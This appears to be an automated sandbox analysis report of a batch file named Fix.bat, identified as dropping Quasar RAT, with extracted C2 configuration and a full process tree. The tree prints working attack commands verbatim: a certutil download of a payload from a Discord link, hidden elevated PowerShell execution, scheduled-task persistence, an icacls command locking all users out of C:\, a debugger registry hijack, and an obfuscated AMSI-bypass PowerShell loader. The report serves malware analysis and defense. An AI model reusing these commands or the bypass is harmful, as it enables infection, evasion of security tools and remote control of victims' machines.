Analysis

  • max time kernel
    288s
  • max time network
    301s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    12-05-2024 19:01

General

  • Target

    Fix.bat

  • Size

    621B

  • MD5

    e235e723f57a72ef725306c3e14d4726

  • SHA1

    9b2153053f8e89c300e32da5df32e9b990594aac

  • SHA256

    aebe0bafeb12706e614a45f2df40518d32d502093517ce95e2d3c1bbfd64ca67

  • SHA512

    0a4eda531be3904ae944d2c1c43755921cde4333a8e9d6bee6669e3de73b6c7859bb7ab3aa7a712fa2085d3fa1fb1d1ed14e5d6ed488a10bd2f6ab6ed049d25e

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

RPad

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-okPqrmZ8kNVUcS4Rp0

Attributes
  • encryption_key

    XmcBnPuLlN1e8SHIRR1z

  • install_name

    $sxr-powershell.exe

  • log_directory

    $SXR-LOGS

  • reconnect_delay

    3000

  • startup_key

    $sxr-powershell

  • subdirectory

    $sxr-seroxen2

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Executes dropped EXE 4 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 17 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:584
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:992
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{0c353467-178a-4639-a7e4-d7449f47e637}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3904
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{fc9e926c-4363-4f2c-bb55-d256de6fd151}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2204
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:636
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
          1⤵
            PID:740
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
            1⤵
              PID:900
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
              1⤵
                PID:360
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                1⤵
                  PID:404
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
                  1⤵
                  • Drops file in System32 directory
                  PID:1028
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
                  1⤵
                    PID:1068
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1076
                    • c:\windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:3100
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:WwLRZjDrFiSQ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$gfKqMnlRVnsnhc,[Parameter(Position=1)][Type]$QcHCclvqXC)$scaySfhzHYm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+'c'+'t'+''+[Char](101)+''+'d'+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+'em'+'o'+''+[Char](114)+'y'+[Char](77)+''+'o'+'d'+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+'eg'+[Char](97)+''+[Char](116)+'e'+'T'+''+[Char](121)+'p'+[Char](101)+'','Cl'+[Char](97)+'s'+[Char](115)+''+[Char](44)+'P'+'u'+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+'u'+''+[Char](116)+'o'+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$scaySfhzHYm.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+'pec'+'i'+''+[Char](97)+'lN'+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eB'+'y'+''+[Char](83)+'ig,Pu'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$gfKqMnlRVnsnhc).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+'d');$scaySfhzHYm.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+''+'k'+'e',''+'P'+''+[Char](117)+'b'+'l'+''+'i'+'c,H'+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+'Si'+[Char](103)+''+','+''+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+'lo'+[Char](116)+''+','+'Vi'+[Char](114)+''+[Char](116)+''+'u'+'al',$QcHCclvqXC,$gfKqMnlRVnsnhc).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+'g'+'e'+''+[Char](100)+'');Write-Output $scaySfhzHYm.CreateType();}$LBjkpNymJHNPn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+'s'+''+'o'+'f'+[Char](116)+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+'3'+''+'2'+'.'+[Char](85)+'ns'+[Char](97)+''+'f'+'e'+'N'+''+'a'+'t'+[Char](105)+''+[Char](118)+'e'+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$PXjInHyivKflyt=$LBjkpNymJHNPn.GetMethod(''+[Char](71)+'e'+[Char](116)+''+'P'+''+'r'+''+[Char](111)+''+[Char](99)+'Add'+'r'+''+[Char](101)+'s'+'s'+'',[Reflection.BindingFlags](''+'P'+'u'+[Char](98)+'l'+'i'+'c,'+'S'+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$enWRDMIYyAJoKmGVURa=WwLRZjDrFiSQ @([String])([IntPtr]);$iFOzXBcjSIsBdElUvtrlcI=WwLRZjDrFiSQ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$hOXMvXTmHCz=$LBjkpNymJHNPn.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+'u'+'l'+''+[Char](101)+'H'+[Char](97)+''+'n'+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'r'+[Char](110)+''+'e'+''+'l'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'')));$EaDCxPrmyumDjz=$PXjInHyivKflyt.Invoke($Null,@([Object]$hOXMvXTmHCz,[Object](''+'L'+''+[Char](111)+''+'a'+'d'+[Char](76)+''+'i'+''+[Char](98)+'rar'+'y'+'A')));$MJFtkLQtPiPvqXJAj=$PXjInHyivKflyt.Invoke($Null,@([Object]$hOXMvXTmHCz,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+''+[Char](80)+'r'+[Char](111)+'te'+[Char](99)+''+[Char](116)+'')));$oLeupIc=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EaDCxPrmyumDjz,$enWRDMIYyAJoKmGVURa).Invoke(''+'a'+''+[Char](109)+'s'+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$xJbUgRsbLCNxQgjAg=$PXjInHyivKflyt.Invoke($Null,@([Object]$oLeupIc,[Object]('A'+'m'+''+[Char](115)+''+[Char](105)+''+[Char](83)+'ca'+[Char](110)+'B'+[Char](117)+''+[Char](102)+'f'+[Char](101)+''+'r'+'')));$wuNJtEpXpk=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MJFtkLQtPiPvqXJAj,$iFOzXBcjSIsBdElUvtrlcI).Invoke($xJbUgRsbLCNxQgjAg,[uint32]8,4,[ref]$wuNJtEpXpk);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$xJbUgRsbLCNxQgjAg,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MJFtkLQtPiPvqXJAj,$iFOzXBcjSIsBdElUvtrlcI).Invoke($xJbUgRsbLCNxQgjAg,[uint32]8,0x20,[ref]$wuNJtEpXpk);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+'F'+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+'7'+'7'+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:3736
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:hhPuomBFISRc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$cEgiaZZfwwobqh,[Parameter(Position=1)][Type]$WRVbOohlFn)$cxhgAnNiZnt=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+'fl'+'e'+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+'d'+'Dele'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+[Char](111)+''+'d'+'ul'+'e'+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+'el'+'e'+''+[Char](103)+''+[Char](97)+''+'t'+'e'+'T'+''+'y'+'pe',''+'C'+''+[Char](108)+''+'a'+'s'+'s'+',Pub'+[Char](108)+'i'+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+','+''+'A'+'ns'+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+'C'+[Char](108)+'a'+'s'+''+[Char](115)+'',[MulticastDelegate]);$cxhgAnNiZnt.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e'+[Char](44)+''+'H'+'id'+'e'+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$cEgiaZZfwwobqh).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+'na'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$cxhgAnNiZnt.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+''+'u'+''+[Char](98)+'l'+'i'+''+[Char](99)+','+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'Ne'+'w'+'Sl'+[Char](111)+''+[Char](116)+','+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'',$WRVbOohlFn,$cEgiaZZfwwobqh).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+','+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $cxhgAnNiZnt.CreateType();}$NrucsrRKGaUxJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+'d'+'l'+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+'ros'+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+'.'+''+'U'+'nsa'+[Char](102)+''+'e'+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+'i'+'v'+'e'+''+'M'+'e'+[Char](116)+''+'h'+''+'o'+''+[Char](100)+''+'s'+'');$oUXWclwRsWlHwU=$NrucsrRKGaUxJ.GetMethod('G'+'e'+''+[Char](116)+''+[Char](80)+'r'+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+'d'+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+'ti'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JZkkRaMcVAPZXGzAClU=hhPuomBFISRc @([String])([IntPtr]);$XvdjoxdsHOodYDJyLqmyJx=hhPuomBFISRc @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$iaCckIdrKkc=$NrucsrRKGaUxJ.GetMethod(''+'G'+''+[Char](101)+'t'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+''+'H'+'an'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+''+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+'2'+'.'+'d'+''+[Char](108)+''+[Char](108)+'')));$peXcuoJDaWjtFj=$oUXWclwRsWlHwU.Invoke($Null,@([Object]$iaCckIdrKkc,[Object]('L'+'o'+''+[Char](97)+''+'d'+''+[Char](76)+''+'i'+''+'b'+'r'+[Char](97)+''+'r'+''+[Char](121)+''+'A'+'')));$LDJHWGTTSxokGXruu=$oUXWclwRsWlHwU.Invoke($Null,@([Object]$iaCckIdrKkc,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+'c'+'t'+'')));$jMuPcBm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($peXcuoJDaWjtFj,$JZkkRaMcVAPZXGzAClU).Invoke('am'+'s'+'i'+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'');$NodlAWHufosIqtmdB=$oUXWclwRsWlHwU.Invoke($Null,@([Object]$jMuPcBm,[Object]('A'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+'r')));$zqUPXVkNkW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LDJHWGTTSxokGXruu,$XvdjoxdsHOodYDJyLqmyJx).Invoke($NodlAWHufosIqtmdB,[uint32]8,4,[ref]$zqUPXVkNkW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$NodlAWHufosIqtmdB,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LDJHWGTTSxokGXruu,$XvdjoxdsHOodYDJyLqmyJx).Invoke($NodlAWHufosIqtmdB,[uint32]8,0x20,[ref]$zqUPXVkNkW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+'T'+''+'W'+''+[Char](65)+''+'R'+'E').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+'a'+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4348
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          3⤵
                            PID:2008
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k localservice -s nsi
                        1⤵
                          PID:1172
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                          1⤵
                            PID:1204
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
                            1⤵
                              PID:1300
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s Themes
                              1⤵
                                PID:1308
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k localservice -s EventSystem
                                1⤵
                                  PID:1324
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                  1⤵
                                    PID:1444
                                  • c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                    1⤵
                                      PID:1476
                                      • c:\windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:2976
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
                                        1⤵
                                          PID:1484
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
                                          1⤵
                                            PID:1540
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k networkservice -s Dnscache
                                            1⤵
                                              PID:1560
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                              1⤵
                                                PID:1672
                                              • c:\windows\system32\svchost.exe
                                                c:\windows\system32\svchost.exe -k localservice -s netprofm
                                                1⤵
                                                  PID:1772
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                  1⤵
                                                    PID:1784
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
                                                    1⤵
                                                      PID:1800
                                                    • c:\windows\system32\svchost.exe
                                                      c:\windows\system32\svchost.exe -k appmodel -s StateRepository
                                                      1⤵
                                                        PID:1824
                                                      • c:\windows\system32\svchost.exe
                                                        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                        1⤵
                                                          PID:1936
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2012
                                                          • c:\windows\system32\svchost.exe
                                                            c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
                                                            1⤵
                                                              PID:1864
                                                            • c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                              1⤵
                                                                PID:2276
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
                                                                1⤵
                                                                  PID:2284
                                                                • c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                  1⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2316
                                                                • c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
                                                                  1⤵
                                                                  • Drops file in System32 directory
                                                                  PID:2420
                                                                • C:\Windows\sysmon.exe
                                                                  C:\Windows\sysmon.exe
                                                                  1⤵
                                                                    PID:2452
                                                                  • c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
                                                                    1⤵
                                                                      PID:2464
                                                                    • c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
                                                                      1⤵
                                                                        PID:2472
                                                                      • c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                        1⤵
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2480
                                                                      • c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                        1⤵
                                                                          PID:2488
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                          1⤵
                                                                            PID:2572
                                                                          • C:\Windows\system32\wbem\unsecapp.exe
                                                                            C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                            1⤵
                                                                              PID:2936
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                                                                              1⤵
                                                                                PID:3000
                                                                              • c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
                                                                                1⤵
                                                                                  PID:3144
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3288
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fix.bat"
                                                                                    2⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:788
                                                                                    • C:\Windows\system32\certutil.exe
                                                                                      certutil -urlcache -split -f "https://cdn.discordapp.com/attachments/1237881664131174481/1239282786335064204/BoostBot.exe?ex=66425b89&is=66410a09&hm=76121e524db94e51397af0fa52812c443a6cb5a194da52bb2909deb394f90aee&" BoostBot.exe
                                                                                      3⤵
                                                                                        PID:1816
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Process -FilePath 'BoostBot.exe' -Verb RunAs"
                                                                                        3⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:5112
                                                                                        • C:\Users\Admin\AppData\Local\Temp\BoostBot.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\BoostBot.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2516
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\BoostBot.exe" /rl HIGHEST /f
                                                                                            5⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:520
                                                                                          • C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:748
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f
                                                                                              6⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:2096
                                                                                            • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:2432
                                                                                          • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:2852
                                                                                          • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                            "SCHTASKS.exe" /create /tn "$77BoostBot.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\BoostBot.exe'" /sc onlogon /rl HIGHEST
                                                                                            5⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:1212
                                                                                      • C:\Windows\system32\icacls.exe
                                                                                        icacls "C:\" /deny *S-1-1-0:(OI)(CI)F /T
                                                                                        3⤵
                                                                                        • Modifies file permissions
                                                                                        PID:2104
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Executable File Execution Options\cmd.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f
                                                                                        3⤵
                                                                                          PID:3076
                                                                                        • C:\Windows\system32\attrib.exe
                                                                                          attrib +h "C:\Users\Admin\AppData\Local\Temp\Fix.bat"
                                                                                          3⤵
                                                                                          • Views/modifies file attributes
                                                                                          PID:2188
                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                      1⤵
                                                                                        PID:3816
                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                        1⤵
                                                                                          PID:4076
                                                                                        • c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k localservice -s CDPSvc
                                                                                          1⤵
                                                                                            PID:4756
                                                                                          • c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
                                                                                            1⤵
                                                                                              PID:3028
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
                                                                                              1⤵
                                                                                                PID:3488
                                                                                              • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                1⤵
                                                                                                • Drops file in System32 directory
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:2948
                                                                                              • c:\windows\system32\svchost.exe
                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                                1⤵
                                                                                                  PID:5096
